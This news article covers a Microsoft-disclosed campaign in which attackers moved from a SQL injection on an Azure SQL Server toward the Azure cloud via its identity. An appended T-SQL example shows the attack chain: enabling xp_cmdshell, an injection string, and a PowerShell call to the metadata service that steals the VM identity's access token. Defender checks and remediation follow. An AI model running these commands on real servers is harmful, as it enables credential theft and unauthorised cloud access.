
Attackers Exploit SQL Server to Penetrate Azure Cloud

Microsoft Discloses Unusual Hacking Attempt

Microsoft says it spotted an unusual hacking campaign in which hackers attempted to move laterally through the Azure cloud after compromising a virtual SQL server.


It marks the first time that cyber defenders for the computing giant have seen a lateral movement attempt in the Azure cloud with SQL Server as the starting point, the company said in a Tuesday blog post. Hackers have previously done so from virtual machines and Kubernetes clusters, "but not in SQL Server."

Microsoft said it is disclosing the attempt despite having detected the hackers so defenders can be "aware of this technique used in SQL Server instances."

Lateral movement is the bread-and-butter hacking method that uses an initial foothold into a network as the jumping-off point for further access to data and systems. Microsoft said the rise of cloud computing is leading hackers to probe for new ways to achieve it. One technique is to use the identity attached to the compromised cloud resource - its cloud identity - to pivot to whatever other resources that identity has been granted access to within the tenant.

Hackers began with a SQL injection attack on an application whose database login, Microsoft said, had elevated permissions on the SQL Server instance running in an Azure virtual machine. The attackers used those permissions to turn on xp_cmdshell, an extended stored procedure that runs operating system commands from within a SQL query. xp_cmdshell is disabled by default in SQL Server as a precaution, and enabling it requires server-level privileges such as sysadmin.

Microsoft said the hackers performed typical hacking behavior - reading directories, listing processes, downloading "several executables and PowerShell scripts."

It's what they did afterward that has Redmond's attention. They queried the Azure Instance Metadata Service, or IMDS, to obtain an access token for the cloud identity attached to the SQL Server virtual machine. IMDS returns that token as a JSON Web Token containing the identity's claims and a signature, which any caller can present to Azure APIs as that identity.

With the identity token, the hackers could have moved beyond the SQL Server into other cloud resources that identity could reach. They failed "due to an error," Microsoft said. One way to head off similar future attempts, the company said, is to make sure that cloud resources operate with the least privilege required, so that a compromised identity cannot reach resources it has no business touching.
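The chain described above, expressed as T-SQL, followed by the checks a defender would run on the SQL Server side. This is an added example, not code from Microsoft's post or from the article. The IMDS endpoint, the Metadata header and the API version are Azure's documented ones; the target resource (the Azure Resource Manager API) and the login name webapp_login are assumptions made for illustration.

```sql
-- Attacker side. The injected SQL user holds sysadmin (or ALTER SETTINGS), so it can
-- change server-level options. In a stacked-query injection the enable step arrives
-- inside the injected input, for example: '; EXEC sp_configure 'xp_cmdshell', 1; --
EXEC sp_configure 'show advanced options', 1;   -- xp_cmdshell is an advanced option
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- With xp_cmdshell on, a single query runs an OS command on the VM. Here the command
-- asks IMDS for a token for the VM's managed identity. The resource parameter
-- (management.azure.com, i.e. Azure Resource Manager) is an assumption; the attacker
-- chooses whatever API the identity is allowed to call.
EXEC xp_cmdshell 'powershell -NoProfile -Command "(Invoke-RestMethod -Headers @{Metadata=''true''} -Uri ''http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'').access_token"';

-- Defender side. value_in_use = 1 means xp_cmdshell is currently enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Turn it back off and hide advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Least privilege at the database layer: the application's login (webapp_login is a
-- hypothetical name) must not be sysadmin, and must not hold ALTER SETTINGS, which is
-- the permission sp_configure needs. Without either, the injection above stops at the
-- first EXEC sp_configure.
ALTER SERVER ROLE sysadmin DROP MEMBER webapp_login;
REVOKE ALTER SETTINGS FROM webapp_login;
```

The SELECT against sys.configurations is the check worth scheduling: xp_cmdshell being enabled on a server that does not need it is the earliest durable indicator of this chain. The IMDS call itself is not visible to SQL Server, so the VM-side signal is an outbound request to 169.254.169.254 from a sqlservr.exe child process, which is worth a detection rule of its own.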


About the Author

Prajeet Nair

Prajeet Nair

Assistant Editor, Global News Desk, ISMG

Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.




